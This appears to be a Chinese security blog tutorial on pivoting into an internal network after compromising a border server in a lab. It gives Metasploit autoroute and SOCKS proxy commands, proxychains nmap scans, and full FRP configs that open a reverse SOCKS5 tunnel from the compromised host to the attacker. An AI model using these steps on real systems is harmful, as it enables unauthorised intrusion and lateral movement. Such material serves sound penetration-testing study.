省护刚结束,实在没时间......
MSF 搭建代理
让我们来瞧一瞧 MSF 的代理如何搭建,代理之前的攻击步骤我们就先省略了哈,这里主要关注攻击成功后如何搭建和使用代理。
代理的基本原理和使用场景上次介绍了,如下:
一共三台设备
Kali(攻击机):192.168.49.139
CentOS7(边界服务器):192.168.49.191、192.168.52.137
Windows Server 2016(内网服务器):192.168.52.138
设备连通性:Kali → CentOS7 → Windows Server 2016
操练起来
背景是 CentOS7 作为目标网络的边界服务器已经被我们拿到了系统权限,接下来我们想以这个服务器为跳板攻击内网设备,拿内网设备权限。
首先我们得到了 CentOS7 的 meterpreter
接下来获取内网路由信息
run get_local_subnets
发现存在 49.0 和 52.0 两个网段,49.0 是我们可以正常访问的,52.0 是无法直接访问的,所以接下来我们就是要通过代理技术访问到 52.0 网段。
基于当前会话添加去往内网网段的路由
run post/multi/manage/autoroute
或
run autoroute -s 192.168.52.0/24
查看路由是否添加成功
run autoroute -p
此时 MSF 就可以利用这个路由访问内网其它设备了,但是如果还想除了 MSF 以外的工具或攻击设备也能访问内网,这个时候就需要派代理上场了。
将会话挂起,准备搭建代理
bg
搜索用于搭建代理的模块
search socks
选择模块
use auxiliary/server/socks_proxy
设置相关参数并生成代理
set srvhost 0.0.0.0 # 设置代理的 IP(默认就是四个 0,所以可以不配)
set username admin # 设置代理的账号(可选)
set password 123.com # 设置代理的密码(可选)
run -d # 生成代理
查看代理
jobs
在 kali 自带的代理工具 proxychains 配置文件中配置好代理
vim /etc/proxychains4.conf
最后一行添加:
socks5 192.168.49.139 1080 admin 123.com
然后保存退出
接下来使用代理扫描内网主机
proxychains4 nmap 192.168.52.0/24 -sT -Pn
或
proxychains4 nmap 192.168.52.138 -sT -Pn
重新开一个命令行窗口执行上述命令,这里相当于让 nmap 使用代理访问内网,一个是扫网段、一个是扫具体目标,此时访问内网的流量会从 CentOS7 发出,这里可以将 kali 和 CentOS7 视为一体。
这中间还有很多扫描信息......由于太多了,所以我只截取了最上面和最下面部分内容
成功扫描到目标主机开放了 80、135、139、445、3306 端口。
其它工具或设备此时也可以通过 kali 的代理访问内网设备。
比如物理机浏览器配置 kali 代理
使用物理机访问内网
成功!
ok,美少妇完事!
FRP 代理
这里再看一下 FRP 的内网代理吧,也就是之前 FRP 文章中说的"黑客也都会用这个工具做攻击",但是当时没有演示到这部分内容。
一共三台设备
Kali(攻击机):192.168.49.139
CentOS7(边界服务器):192.168.49.191、192.168.52.137
Windows Server 2016(内网服务器):192.168.52.138
设备连通性:Kali → CentOS7 → Windows Server 2016
操练起来
服务端(攻击端设备 Kali)
将 frps 放入服务端。
创建 frps.toml,将以下内容放进去。
bindPort = 5555 #绑定的端口
auth.token = "sdjf89734lkjsdf987234" #客户端服务端连接的密码
客户端(被攻击端边界服务器 CentOS7)
将 frpc 放入客户端。
创建 frpc.toml,将以下内容放进去。
serverAddr = "192.168.49.139"
serverPort = 5555 #服务器绑定的端口
auth.token = "sdjf89734lkjsdf987234" #连接的密码
healthCheck.type = "tcp" #启用健康检查,类型为 tcp
healthCheck.intervalSeconds = 100 #每隔 100 秒进行一次健康检查
[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 6666 #代理的端口
transport.useEncryption = true #是否加密
transport.useCompression = true #传输内容是否进行压缩
[proxies.plugin]
type = "socks5"
分别启动服务端和客户端
./frps -c frps.toml
./frpc -c frpc.toml
如果提示权限不够就先给权限:chmod 777 frpc
接下来就可以遨游内网了
在 kali 上配置好代理
# 代理 IP 和端口
192.168.49.139:6666
然后访问内网的 Windows Server 2016
# 浏览器访问内网
http://192.168.52.138
成功!
其它工具或设备此时也可以通过 kali 的代理访问内网设备。
比如物理机浏览器配置 kali 代理,然后使用物理机访问内网,操作和前面一样一样的,不赘述了。
ok,FRP 完事!
话说这个短剧为啥这么火?有人看嘛?
关注公众号,发送消息"代理"获取环境和工具
END
往期精彩回顾
原文始发于微信公众号(大伯为安全):美少妇和FRP做代理进内网遨游
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论